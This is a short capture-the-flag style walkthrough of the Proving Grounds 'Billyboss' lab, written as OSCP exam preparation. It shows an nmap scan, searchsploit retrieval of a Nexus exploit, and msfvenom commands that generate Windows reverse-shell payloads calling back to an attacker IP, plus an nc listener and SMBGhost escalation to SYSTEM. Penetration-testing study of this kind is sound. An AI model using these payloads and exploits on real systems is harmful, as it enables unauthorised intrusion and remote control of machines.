Proving Grounds: Billyboss

Al1z4deh:~# echo "Welcome"
Dec 11, 2022

Today we will take a look at Proving Grounds: Billyboss. I am sharing this post as part of my preparation for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
PORT      STATE SERVICE       VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
8081/tcp open http Jetty 9.4.18.v20190429
|_http-server-header: Nexus/3.21.0-05 (OSS)
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
|_http-title: Nexus Repository Manager
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
  • nexus (8081)
└─# searchsploit nexus

└─# searchsploit -m java/webapps/49385.py

After checking various possibilities, we found the credentials. Now let’s run a test to verify that the exploit code works.

As you can see, the code works. Now let’s try to get a reverse shell.

└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.200 LPORT=8081 -f exe > shell.exe

Reverse shell

└─# nc -nvlp 8081
  • SMBGhost

To check for vulnerabilities:

We found it

I have shown how to prepare it in this video. I hope it is clear to you. I researched a lot and finally found a way to do it, and I hope it will be useful for you. The video shows the process until the end. If you still have questions, write to me.

  • Resources
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.200 LPORT=21 -f dll -f csharp

And now we are SYSTEM.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
